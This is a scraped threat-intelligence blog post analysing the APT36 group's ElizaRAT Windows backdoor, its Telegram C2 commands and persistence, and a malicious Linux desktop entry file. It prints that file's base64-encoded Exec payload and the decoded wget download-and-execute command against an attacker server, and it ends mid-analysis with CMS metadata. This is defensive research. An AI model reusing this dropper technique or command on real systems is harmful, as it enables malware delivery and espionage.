Introduction<\/p>\n

In July 2023, Zscaler ThreatLabz discovered new malicious activity perpetuated by the Pakistan-based advanced persistent threat group (APT36). APT36 is a sophisticated cyber threat group with a history of conducting targeted espionage operations in South Asia. We observed APT36 targeting Indian government sectors using a previously undocumented Windows RAT, new cyber espionage utilities for Linux, new distribution mechanisms, and a new attack vector used against the Linux environment. <\/p>\n

In this blog, we will examine the latest tools employed by APT36, which are designed to target both Windows and Linux operating systems.<\/p>\n

\tKey Takeaways
\n\tBrief Overview
\n\tAnalysis of ElizaRAT, the New Windows RAT
\n\tMalicious Linux Desktop Entry Files as New Attack Vectors
\n\tNew Python-Based Cyber Espionage Utilities Targeting Linux
\n\tThreat Attribution
\n\tThreat Actor Infrastructure
\n\tConclusion
\n\tZscaler Coverage
\n\tMITRE ATT&CK TTP Mapping
\n\tIndicators of Compromise (IOCs)<\/p>\n

Key Takeaways<\/p>\n

\tUpdated arsenal of APT36: The threat actor has resurfaced with a fresh, fully functional Windows remote administration tool (RAT), novel tools for cyber espionage on Linux systems, innovative distribution methods, and additional attack vectors.
\n\tNew Windows RAT: A custom RAT, referred to as ElizaRAT, has been incorporated into the APT36 toolkit. ElizaRAT is delivered as a .NET binary and establishes a C2 communication channel via Telegram, enabling threat actors to exert complete control over the targeted endpoint.
\n\tAbuse of legitimate services: Legitimate services, such as Google Drive and Telegram, are abused in different stages of the attack chain.
\n\tNew attack vectors for Linux: APT36 now boasts innovative weaponization of Linux desktop configuration files that target Linux-based endpoints in the Indian government sector.
\n\tDeceptive tactics: The threat actor took extensive measures to conceal any link to Pakistan. They chose the infrastructure and artifacts meticulously to make it appear as though the activities were conducted in India.
\n\tReuse of infrastructure: In some cases, the same C2 infrastructure is being used by APT36 for both credential phishing attacks and distributing malicious binaries.<\/p>\n

Brief Overview<\/p>\n

APT36 is an advanced persistent threat (APT) group which we attribute to Pakistan with very high confidence. This group has been active since 2013 and primarily targets the Indian government, defense, and education sectors.<\/p>\n

This group leverages credential harvesting and malware distribution attacks to conduct cyber espionage. APT36 utilizes:<\/p>\n

\tCustom-built remote administration tools targeting Windows
\n\tLightweight Python-compiled cyber espionage tools serving specific purpose targeting Windows and Linux
\n\tWeaponized open-source C2 frameworks like Mythic
\n\tTrojanized installers of Indian government applications like KAVACH multi-factor authentication
\n\tTrojanized Android apps
\n\tCredential phishing sites targeting Indian government officials<\/p>\n

Analysis of ElizaRAT, the New Windows RAT<\/p>\n

We assigned the moniker “ElizaRAT” to this new Windows-based backdoor utilized by APT36 due to the distinctive strings identified within the commands observed during our real-time analysis of the C2 communication channel.<\/p>\n

ElizaRAT is distributed as .NET binaries sent inside password-protected archive files hosted on Google Drive links. During our threat analysis, we gathered several samples of ElizaRAT and they all shared these characteristics:<\/p>\n

\tThey are all .NET binaries that are compiled as Control Panel applets (CPL) and use the “.cpl” file extension. To the best of our knowledge, we believe this is the first time APT36 has weaponized the CPL file format.
\n\tThe binaries are large in size – ranging from 4MB to 16MB.
\n\tThe Costura .NET framework was used to embed the essential .NET assemblies inside the main malware which resulted in the inflation of binary sizes.
\n\tThe Telegram API was used for C2 communication.<\/p>\n

For this technical analysis, we use the following file metadata:<\/p>\n

\tMD5 hash: fc99daa2e1b47bae4be51e5e59aef1f0
\n\tFilename: AgendaMeeting.cpl<\/p>\n

Since this Windows RAT arrives on the endpoint in the form of a Control Panel applet, the first method called upon execution is CplApplet().<\/p>\n

This method transfers control to Program().Main() which in turn invokes an asynchronous task – MainAsync(). Inside this task, all important malicious operations are carried out.<\/p>\n

The image below shows Program().Main() kick starting the malicious activities on the endpoint.<\/p>\n

Figure 1: The MainAsync() method used to start the malicious activities on the endpoint.<\/p>\n

Some of the key operations performed by ElizaRAT are:<\/p>\n

\tInitializes the Telegram bot with Communicate.ConnectMe() using the built-in Telegram bot token and sets it up in polling mode to receive commands from the threat actor.
\n\tCreates a directory: %appdata%TextSource
\n\tGenerates a UUID and username specific to the infected machine.
\n\tDrops and displays a decoy PDF file to the user.
\n\tSets up persistence on the machine.
\n\tFetches details on antivirus softwares running on the machine and sends the information to the attacker-controlled Telegram bot.<\/p>\n

In the following sections, we dive deeper into some of these operations.<\/p>\n

Logging Operation<\/p>\n

Each execution result is logged on both the endpoint (client-side) and the Telegram bot (server-side).<\/p>\n

The code below shows that logging is done at the local and remote level.<\/p>\n

\t\t\t \/\/ remote logging in Telegram bo
\n\t\t\t await Communication.send_message(“Username Created with name : “
\n\t\t\t+ TextSource.Settings._username);
\n\t\t\t \/\/ local logging on the infected endpoint
\n\t\t\t File.AppendAllText(TextSource.Settings.log_p, “username created
\n\t\t\tlocaln”);<\/p>\n

Unique Identifier Generation<\/p>\n

A UUID and username are generated for each infected machine so that the threat actor can uniquely identify the victim. It uses Windows Management Instrumentation (WMI) to fetch the processorID and UUID of the machine, and uses both these details to generate a UUID and username specific to the infected machine<\/p>\n

The only difference between the generated UUID and the username is the “.cookie” extension. The username is the UUID without the “.cookie” extension.<\/p>\n

The image below shows the relevant code used to generate these values.<\/p>\n

Figure 2: The getusername() method used to generate the UUID and username to identify the infected machine.<\/p>\n

C2 Command Format<\/p>\n

Since the threat actor uses the same Telegram bot to manage multiple infected endpoints, they use a specific C2 command format to synchronize the operations and ensure that a given command executes only on the intended endpoint.<\/p>\n

The C2 command format looks like this:<\/p>\n

<command>*<username>*<arguments><\/p>\n

C2 Commands<\/p>\n

All C2 commands are handled in a switch-case statement by the Bot_OnMessage() method inside the Communicate class. Before the execution of any command, the RAT extracts the username from the C2 command and compares it with the infected machine’s username. The command is executed successfully only if both the values match.<\/p>\n

The following C2 commands are supported by the bot:<\/p>\n

\tTable 1: C2 commands supported by Telegram bot<\/p>\n

\t\t\tC2 COMMAND
\n\t\t\tFUNCTIONALITY<\/p>\n

\t\t\t\/dir
\n\t\t\tFetches the list of files in the specified directory.<\/p>\n

\t\t\t\/upload
\n\t\t\tUploads the specified file from the victim’s machine.<\/p>\n

\t\t\t\/getprocess
\n\t\t\tGets the list of processes running on the victim’s machine. The list is returned in a file with the name getproc.dll .<\/p>\n

\t\t\t\/run
\n\t\t\tExecutes the specified program on the victim’s machine.<\/p>\n

\t\t\t\/delete
\n\t\t\tDeletes the specified file.<\/p>\n

\t\t\t\/end
\n\t\t\tKills the specified processes on the victim’s machine.<\/p>\n

\t\t\t\/online
\n\t\t\tChecks whether the infected machine is online.<\/p>\n

\t\t\t\/identity
\n\t\t\tConnects to the specified website from the victim’s machine and sends a response to the threat actor. This can be used to fetch the machine’s IP address by supplying a parameter like hxxps:\/\/api.ipify[.]org .<\/p>\n

\t\t\t\/ping
\n\t\t\tChecks internet connectivity from the victim’s machine to the specified website.<\/p>\n

\t\t\t\/scr
\n\t\t\tTakes a screenshot of the victim’s machine and sends it to the threat actor in a file named scr.dll .<\/p>\n

\t\t\t\/createdir
\n\t\t\tCreates a directory on the user’s machine.<\/p>\n

Persistence<\/p>\n

In order to achieve persistence on the infected machine, the bot creates a Windows shortcut file (LNK) in the Windows Startup directory. <\/p>\n

The image below shows the code used to create this shortcut file. The name of the shortcut file is fetched from the “orig_name” setting defined in the config. In this case, the shortcut file is called TextSource.lnk.<\/p>\n

Figure 3: The buildforts() method used to create a Windows shortcut file in the Startup directory for persistence.<\/p>\n

The description of this shortcut file is set to “Text Editing APP for Windows” to disguise it as a text editing application, making it seem innocuous. In addition, the target command line is set to execute the Control panel applet using rundll32 .<\/p>\n

Displaying Decoy Content<\/p>\n

The method dosome() defined in the Program class is responsible for displaying the decoy PDF file to the user. This decoy file is present inside the resources section of the .NET binary. <\/p>\n

The image below shows the decoy file. It is only used to distract the victim and make it appear that an error occurred when opening the file.<\/p>\n

Figure 4: Decoy PDF file displayed to the user.<\/p>\n

Malicious Linux Desktop Entry Files as New Attack Vectors<\/p>\n

The utilization of Linux desktop entry files by APT36 as an attack vector has never been documented before. This attack vector is fairly new and appears to be utilized in very low-volume attacks. So far, our research team has discovered three samples – all of which have 0 detection on VirusTotal.<\/p>\n

We first observed an occurrence in May 2023 when a credential phishing website used to target Indian government employees was also found to be hosting a redirector to distribute ZIP archives containing malicious Linux desktop entry files.<\/p>\n

National Informatics Center (NIC), India Phishing Attack – May 2023<\/p>\n

In May 2023, we discovered a credential phishing site, email9ov[.]in, targeting Indian government officials by masquerading as the official login portal for National Informatics Center (NIC), India. We notified NIC in May 2023 about this website and the associated threat intel. <\/p>\n

We also noticed that the same phishing website was using the hxxps:\/\/email9ov[.]in\/VISIT_OF_MEDICAL URL to redirect visitors to the hxxp:\/\/103.2.232[.]82:8081\/Tri-Service-Exercise\/Delegation_Saudi_Arabia.zip URL.<\/p>\n

From here, a visitor would download a ZIP archive containing a maliciously crafted Linux desktop entry file.<\/p>\n

Here are some technical details about this case:<\/p>\n

\tZIP archive MD5 hash: 9c66f8c0c970822985600bed04e56434
\n\tZIP filename: Delegation_Saudi_Arabia.zip
\n\tDesktop entry file MD5 hash: f27a4968af4ed64baef8e086516e86ac
\n\tDesktop entry filename: Delegation_Saudi_Arabia.desktop<\/p>\n

Desktop entry file analysis<\/p>\n

We found the following content in the desktop entry file:<\/p>\n

\t\t\t[Desktop Entry]
\n\t\t\tEncoding=UTF-8
\n\t\t\tName=Delegation_Saudi_Arabia.pdf
\n\t\t\tExec=sh -c “echo ‘L3Vzci9iaW4vd2dldCAnaHR0cDovLzEwMy4yLjIzMi44Mjo4MDgxL1R
\n\t\t\tyaS1TZXJ2aWNlLUV4ZXJjaXNlL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLnBkZicgLU8g
\n\t\t\tL3RtcC9EZWxlZ2F0aW9uX1NhdWRpX0FyYWJpYS5wZGY7IC91c3IvYmluL3dnZXQgJ2
\n\t\t\th0dHA6Ly8xMDMuMi4yMzIuODI6ODA4MS9JU0VQQy0xMi0yMDIzLUFnZW5kYS1mb3It
\n\t\t\tbWVldGluZy8xODUnIC1PIC90bXAvMTg1LmVsZjsgY2QgL3RtcDsgY2htb2QgK3ggMTg1
\n\t\t\tLmVsZjtsaWJyZW9mZmljZSAvdG1wL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLn
\n\t\t\tBkZiB8IC4vMTg1LmVsZg==’ sh”
\n\t\t\tTerminal=false
\n\t\t\tType=Application
\n\t\t\tIcon=x-office-document<\/p>\n

The icon of this desktop entry file is set to “x-office-document” to seem like an innocent Office document.<\/p>\n

The base64-encoded command present inside the desktop entry file decodes to:<\/p>\n

\t\t\t\/usr\/bin\/wget ‘hxxp:\/\/103.2.232[.]82:8081\/Tri-Service-Exercise\/Delegation_Saudi_Arabia.pdf’ -O \/tmp\/Delegation_Saudi_Arabia.pdf; \/usr\/bin\/wget ‘hxxp:\/\/103.2.232[.]82:8081\/ISEPC-12-2023-Agenda-for-meeting\/185’ -O \/tmp\/185.elf; cd \/tmp; chmod +x 185.elf;libreoffice \/tmp\/Delegation_Saudi_Arabia.pdf <\/p>","protected":false},"excerpt":{"rendered":"

Introduction In July 2023, Zscaler ThreatLabz discovered new malicious activity […]<\/p>\n","protected":false},"author":0,"featured_media":1146,"comment_status":"","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":["post-1145","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-zenith-zscaler"],"yoast_head":"\n